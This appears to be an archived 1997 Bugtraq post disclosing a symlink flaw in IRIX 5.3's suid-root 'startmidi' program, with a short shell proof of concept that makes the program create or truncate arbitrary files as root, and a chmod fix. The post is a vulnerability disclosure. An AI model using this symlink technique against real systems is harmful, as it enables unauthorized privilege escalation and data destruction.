Bugtraq mailing list archives
IRIX: Bug in startmidi
From: hedley () CS BRIS AC UK (David Hedley)
Date: Sun, 9 Feb 1997 18:11:45 +0000
Whilst browsing around the filesystem on my SGI (running IRIX 5.3), I noticed a little suid-root program called 'startmidi' which hides in /usr/sbin. When run, this program creates various files in /tmp. You guessed it, it respects umask and follows symlinks. Comme ca:

    % umask 0
    % ln -s /blardyblar /tmp/.midipid
    % startmidi -d /dev/ttyd1
    % ls -l /blardyblar
    -rw-rw-rw- 1 root pgrad 0 Feb 9 17:46 /blardyblar
    % stopmidi -d /dev/ttyd1
    %

Any existing files are truncated to zero length. New files are created root-owned, mode 0666. I leave it to your furtive imaginations to get root from this.

'stopmidi' removes the files created by 'startmidi' so you may have to run that first if /tmp/.midipid already exists.

    chmod -s /usr/sbin/startmidi

fixes this problem.

My apologies if this has been documented before but I couldn't find it anywhere on file and I don't remember it being posted to this list.

Regards,

David
--
David Hedley (hedley () cs bris ac uk)
finger hedley () cs bris ac uk for PGP key
Computer Graphics Group | University of Bristol | UK